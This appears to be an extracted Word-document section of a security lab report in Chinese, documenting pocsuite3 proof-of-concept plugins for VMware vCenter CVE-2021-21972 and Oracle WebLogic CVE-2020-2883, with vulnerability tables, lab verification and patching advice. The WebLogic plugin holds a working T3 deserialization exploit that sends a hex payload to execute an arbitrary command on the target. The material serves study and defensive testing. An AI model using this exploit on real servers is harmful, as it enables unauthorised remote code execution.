            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="379112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1281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44" w:name="_Toc31124"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="922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1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="15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UVD-ID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——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漏洞类别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代码执行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CVE-ID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CVE-2021-21972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披露/发现时间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2021-2-23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bugtraq编号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——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CNNVD-202102-1566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提交时间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2021-2-25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漏洞发现者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PT Security和Noah Blog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CNVD-2021-12322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漏洞等级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9.8|严重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提交者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PT Security和Noah Blog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搜索关键词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CVE-2021-21972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影响范围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　VMware vCenter Server 7.0系列 &lt; 7.0.U1c</w:t>
            </w:r>
          </w:p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　VMware vCenter Server 6.7系列 &lt; 6.7.U3l</w:t>
            </w:r>
          </w:p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　VMware vCenter Server 6.5系列 &lt; 6.5 U3n</w:t>
            </w:r>
          </w:p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VMware Cloud Foundation 4.x before 4.2</w:t>
            </w:r>
          </w:p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 VMware Cloud Foundation 3.x before 3.10.1.2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来源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https://www.vmware.com/security/advisories/VMSA-2021-0002.htm</w:t>
            </w:r>
          </w:p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漏洞简介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VMware vCenter Server 远程代码执行漏洞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漏洞详情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vSphere 是 VMware 推出的虚拟化平台套件，包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心，可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="22"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both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vSphere Client（HTML5） 在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求，写入webshell，控制服务器。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参考链接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https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972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靶场信息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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>搭建VMware vsphere(EXSi) 7.0 和 VMware vCenter Server(VCSA) 7.0 环境。外网测试目标：https://178.237.192.2:9144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POC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t>#!/usr/bin/env python</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t># coding: utf-8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>from urllib.parse import urljoin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>from pocsuite3.api import POCBase, Output, register_poc, logger, requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>class DemoPOC(POCBase):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    vulID = ''</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    version = '1.0'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    author = ['']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    vulDate = '2021-02-24'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    createDate = '2021-02-24'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    updateDate = '2021-02-24'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    references = ['']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    name = 'VMware vCenter 未授权RCE漏洞'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    appPowerLink = ''</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    appName = 'VMware vCenter'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    appVersion = ' 7.0 U1c 之前的 7.0 版本、6.7 U3l 之前的 6.7 版本、 6.5 U3n 之前的 6.5 版本'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    vulType = ''</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    desc = '''</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    VMware vCenter 未授权RCE漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    '''</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    samples = ['']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    install_requires = ['']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    def _verify(self):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        result = {}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            vul_url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            resp1 = requests.get(self.url)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            resp2 = requests.get(vul_url)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            if '/vsphere-client' in resp1.text and resp2.status_code == 405:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">                result['VerifyInfo'] = {}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">                result['VerifyInfo']['URL'] = self.url</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            logger.error(e)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        return self.parse_output(result)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    def _attack(self):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        return self._verify()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">    def parse_output(self, result):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        output = Output(self)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        if result:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            output.success(result)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        else:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">            output.fail('Internet nothing returned')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">        return output</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>register_poc(DemoPOC)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修复方案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480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>vCenter Server7.0版本升级到7.0.U1c</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>vCenter Server6.7版本升级到6.7.U3l</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>vCenter Server6.5版本升级到6.5 U3n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc19761"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3 Weblogic Server 代码执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc4010"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3.1 POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是poc编写过程、各部分的含义以及最后的验证结果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4.3.1.1 POC编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>导入必要的库：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>pocsuite3.api 中的 Output, POCBase, register_poc, logger, OptString 用于定义 PoC 和处理输出。socket, ssl, time, binascii 处理网络连接、加密和数据转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>urllib.parse 用于解析 URL。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>类定义：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>定义 CVE_2020_2883_PoC 类，继承自 POCBase。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:t>类的属</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有：</w:t>
      </w:r>
      <w:r>
        <w:t>vulID, version, author, vulDate, createDate, updateDate, references, name, appPowerLink, appName, appVersion, vulType, desc 用于描述漏洞的基本信息和 PoC 的元数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中函数</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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_options(self)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>定义脚本接受的选项。这里定义了一个 command 选项，默认为 id，用于指定要在目标系统上执行的命令。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_verify(self)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>核心验证逻辑：获取目标 URL 和要执行的命令。调用 parseUrl 解析 URL 获取协议、IP、端口和路径。生成漏洞利用的 payload。建立套接字连接并执行 T3 协议握手。发送构造的 T3 请求。处理响应结果。捕获并记录任何异常。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parseUrl(self, url)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>解析 URL 并返回协议、IP、端口和路径。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CVE_2020_2883_payload(self, cmd)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>根据给定命令生成特定格式的 payload。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t3handshake(self, sock, server_addr)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>与目标服务器进行 T3 协议握手。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buildT3RequestObject(self, sock, port)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>构造并发送 T3 请求对象。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parse_output(self, result)：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>处理并格式化输出结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>注册 PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t>register_poc(CVE_2020_2883_PoC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>将定义好的 PoC 类注册到 pocsuite3 框架中。</w:t>
      </w:r>
    </w:p>
    <w:p/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4.3.1.2 POC验证结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为方便环境配置，我们继续使用vulfocus的靶场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注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果再次进行pocsuite,需前往vulfocus网站，找到weglogic反序列化漏洞，开启环境，输入对应的临时靶机ip进行验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="42" name="图片 42" descr="屏幕截图 2024-07-24 16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4-07-24 1602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接着，通过指令在ubuntu上搭建pocsuite环境：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已提前安装pip3,直接安装pocsuite即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4065905" cy="3836035"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12065"/>
            <wp:docPr id="43" name="图片 43" descr="屏幕截图 2024-07-24 16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4-07-24 1604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配置完成后可以通过pocsuite </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>version来验证pocsuite是否成功安装，并查看pocsuite的版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="25"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1630045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="44" name="图片 44" descr="屏幕截图 2024-07-24 16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4-07-24 1605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配置成功后，使用指令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pocsuite -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>.py -u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://123.58.224.8:11071</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在目标URL上验证是否存在漏洞，下面为成功在目标URL上找到漏洞的截图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="635" b="5080"/>
            <wp:docPr id="46" name="图片 46" descr="屏幕截图 2024-07-24 153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4-07-24 1539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47" w:name="_Toc25218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="922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1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="15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UVD-ID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cve-2020-2883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漏洞类别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远程代码执行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CVE-ID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cve-2020-2883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披露/发现时间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2020年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bugtraq编号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无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CNNVD-202010-153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提交时间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漏洞发现者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Oracle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CNVD-ID：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CNVD-2020-10058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漏洞等级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高危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提交者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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EBEBE" w:themeFill="background1" w:themeFillShade="BF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搜索关键词</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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CVE-2020-2883, Weblogic, RCE, Oracle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影响范围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Oracle Weblogic Server 10.3.6.0 和 12.1.3.0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来源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https://www.oracle.com/security-alerts/cpuoct2020.html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漏洞简介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此漏洞允许攻击者通过 Weblogic 的反序列化漏洞在受影响的 Oracle Weblogic Server 实例上执行任意代码。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漏洞详情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jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CVE-2020-2883 是一个反序列化漏洞，攻击者可以通过构造特定的请求触发漏洞，从而在目标系统上执行任意代码。该漏洞影响 Oracle Weblogic Server 的 T3 协议处理，攻击者可以利用此漏洞绕过认证并执行任意代码。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pStyle w:val="22"/>
              <w:spacing w:line="480" w:lineRule="auto"/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参考链接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22"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883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靶场信息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480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Vulfocus中Weblogic反序列化cve-2020-2883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POC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# -*- coding: utf-8 -*-</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from pocsuite3.api import Output, POCBase, register_poc, logger, OptString</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>import socket</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>import ssl</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>import binascii</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from urllib.parse import urlparse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>class CVE_2020_2883_PoC(POCBase):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vulID = 'CVE-2020-2883'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version = '1.0'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author = ['Your Name']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vulDate = '2020-10-20'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createDate = '2023-07-24'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updateDate = '2023-07-24'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references = ['https://nvd.nist.gov/vuln/detail/CVE-2020-2883']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name = 'CVE-2020-2883 Weblogic RCE'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appPowerLink = 'https://www.oracle.com/middleware/technologies/weblogic.html'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appName = 'Oracle Weblogic'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appVersion = '10.3.6.0, 12.1.3.0'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vulType = 'Remote Code Execution'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desc = 'This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Weblogic.'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def _options(self):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o = {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"command": OptString("id", description="Command to execute on the target system")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}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return o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_verify(self):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result = {}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url = self.url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command = self.get_option('command')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proto, ip, port, uri = self.parseUrl(url)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 = self.CVE_2020_2883_payload(command)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try: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with socket.create_connection((ip, int(port)), timeout=10) as s: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wrappedSocket = ssl.wrap_socket(s) if proto == 'https' else s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self.t3handshake(wrappedSocket, (ip, int(port)))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self.buildT3RequestObject(wrappedSocket, port)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wrappedSocket.send(binascii.unhexlify(payload))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time.sleep(2)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result['VerifyInfo'] = {}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result['VerifyInfo']['URL'] = url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result['VerifyInfo']['Command'] = command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    return self.parse_output(result)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except Exception as e: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logger.error(f"Verification failed: {e}")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return self.parse_output(result)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parseUrl(self, url):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parsed = urlparse(url)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proto = parsed.scheme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netloc = parsed.netloc.split(':')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ip = netloc[0]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port = int(netloc[1]) if len(netloc) &gt; 1 else (443 if proto == 'https' else 80)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return proto, ip, port, parsed.path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CVE_2020_2883_payload(self, cmd):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payload_start = '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payload_lenhex = '{:04x}'.format(len(cmd))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payload_cmdhex = binascii.hexlify(cmd.encode()).decode()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payload_end = '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178'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 = payload_start + payload_lenhex + payload_cmdhex + payload_end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return payload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t3handshake(self, sock, server_addr):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sock.connect(server_addr)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sock.send(binascii.unhexlify('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))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time.sleep(1)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data = sock.recv(1024)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logger.info("Handshake successful")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buildT3RequestObject(self, sock, port):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data1 = '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'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payload = binascii.unhexlify(data1)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sock.send(payload)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time.sleep(2)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    def parse_output(self, result):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if result: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output = Output(self)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output.success(result)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else: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output = Output(self)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    output.fail('No response from target')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        return output</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>register_poc(CVE_2020_2883_PoC)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CFCECE" w:themeFill="background2" w:themeFillShade="E5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812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1、官方修复方案</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Oracle已经发布补丁修复了上述漏洞，请用户参考官方通告及时下载受影响产品更新补丁，并参照补丁安装包中的readme文件进行安装更新，以保证长期有效的防护。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注：Oracle官方补丁需要用户持有正版软件的许可账号，使用该账号登陆https://support.oracle.com后，可以下载最新补丁。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2、临时解决方案</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户可通过控制T3协议的访问来临时阻断针对这些漏洞的攻击。操作方法如下：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进入WebLogic控制台，在base_domain的配置页面中，进入“安全”选项卡页面，点击“筛选器”，进入连接筛选器配置。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，参考以下写法，在连接筛选器规则中配置符合企业实际情况的规则：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9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  <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
              <w:t>127.0.0.1 * * allow t3 t3s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
              <w:t>本机IP * * allow t3 t3s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
              <w:t xml:space="preserve">允许访问的IP  * * allow t3 t3s  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
              </w:rPr>
              <w:t>* * * deny t3 t3s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>保存后若规则未生效，建议重新启动WebLogic服务（重启WebLogic服务会导致业务中断，建议相关人员评估风险后，再进行操作）。</w:t>
            </w:r>
          </w:p>
          <w:p/>
        </w:tc>
      </w:tr>
